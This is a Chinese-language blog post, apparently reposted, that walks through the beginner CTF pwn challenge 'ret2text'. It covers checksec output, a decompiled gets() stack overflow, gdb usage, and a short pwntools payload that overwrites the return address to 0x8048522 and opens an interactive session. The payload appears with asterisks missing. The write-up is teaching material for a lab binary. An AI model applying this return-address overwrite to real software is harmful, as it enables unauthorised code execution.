博客
关于我
pwn之栈缓冲区溢出漏洞(入门)
阅读量:519 次
发布时间:2019-03-06

本文共 1460 字,大约阅读时间需要 4 分钟。

题目ret2text

题目信息确认

使用file命令查看文件类型

root@CTF:/home/# file ret2text  ret2text: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=64894e1bcdc9d77d3d983e907eba2605dbf19103, with debug_info, not stripped

使用checksec查看是否有保护

root@CTF:/home/# checksec ret2text [*] '/home/ret2text'    Arch:     i386-32-little    RELRO:    Partial RELRO    Stack:    No canary found    NX:       NX enabled    PIE:      No PIE (0x8048000)

使用ida查看内容

int __cdecl main(int argc, const char **argv, const char **envp){  setbuf(stdin, 0);  setbuf(stdout, 0);  puts("Have you heard of buffer overflow?");  vulnerable();  puts("It seems that you know nothing about it ......");  return 0;}

setbuf(xxxx,0) 关闭缓冲区

进入vulnerable()查看

int vulnerable(){  char buffer[8]; // [esp+8h] [ebp-10h]  gets(buffer);  return 0;}

创建了一个8个字节的缓存,但是gets函数允许向buffer输入无限的内容。造成缓冲区溢出漏洞

根据图
由ida中的注释 char buffer[8]; // [esp+8h] [ebp-10h] 可以知道 这个buffer距离esp8个字符,距离ebp -16个字符(10h是16进制的10)
而ebp永远指向 stack frame pointer 。那么就需要溢出16个字节

动态调试

使用动态调试工具确认溢出长度

gdb xxx 进入调试魔术xxx是指需要动态调试的文件
run 直接运行(一般在run之前使用断点)
b *地址 或者 b main
使用 next 进行断点前进。可以观察一步步的运行结果
使用 s 进入某个具体的函数
或者使用 stack 24 查看24项stack

payload制作

使用 from pwn import * 导入所有pwn需要的工具

使用 io=process("./ret2text") 打开进程访问链接
覆盖数据
[ebp-10h] 一共16个字符。
覆盖 return 4个字符
修改返回地址使用p32(0x8048522)
组成数据 payload=b'a'16+b'1'4+p32(0x8048522)
使用 io.send(payload) 发送payload
使用 io.interactive 创建交互式会话接口

转载地址:http://hnsyz.baihongyu.com/

你可能感兴趣的文章
MVC 区域功能
查看>>
MySQL FEDERATED 提示
查看>>
mysql generic安装_MySQL 5.6 Generic Binary安装与配置_MySQL
查看>>
Mysql group by
查看>>
MySQL I 有福啦,窗口函数大大提高了取数的效率!
查看>>
mysql id自动增长 初始值 Mysql重置auto_increment初始值
查看>>
MySQL in 太多过慢的 3 种解决方案
查看>>
MySQL InnoDB 三大文件日志,看完秒懂
查看>>
Mysql InnoDB 数据更新导致锁表
查看>>
Mysql Innodb 锁机制
查看>>
MySQL InnoDB中意向锁的作用及原理探
查看>>
MySQL InnoDB事务隔离级别与锁机制深入解析
查看>>
Mysql InnoDB存储引擎 —— 数据页
查看>>
Mysql InnoDB存储引擎中的checkpoint技术
查看>>
Mysql InnoDB存储引擎中缓冲池Buffer Pool、Redo Log、Bin Log、Undo Log、Channge Buffer
查看>>
MySQL InnoDB引擎的锁机制详解
查看>>
Mysql INNODB引擎行锁的3种算法 Record Lock Next-Key Lock Grap Lock
查看>>
mysql InnoDB数据存储引擎 的B+树索引原理
查看>>
mysql innodb通过使用mvcc来实现可重复读
查看>>
mysql insert update 同时执行_MySQL进阶三板斧(三)看清“触发器 (Trigger)”的真实面目...
查看>>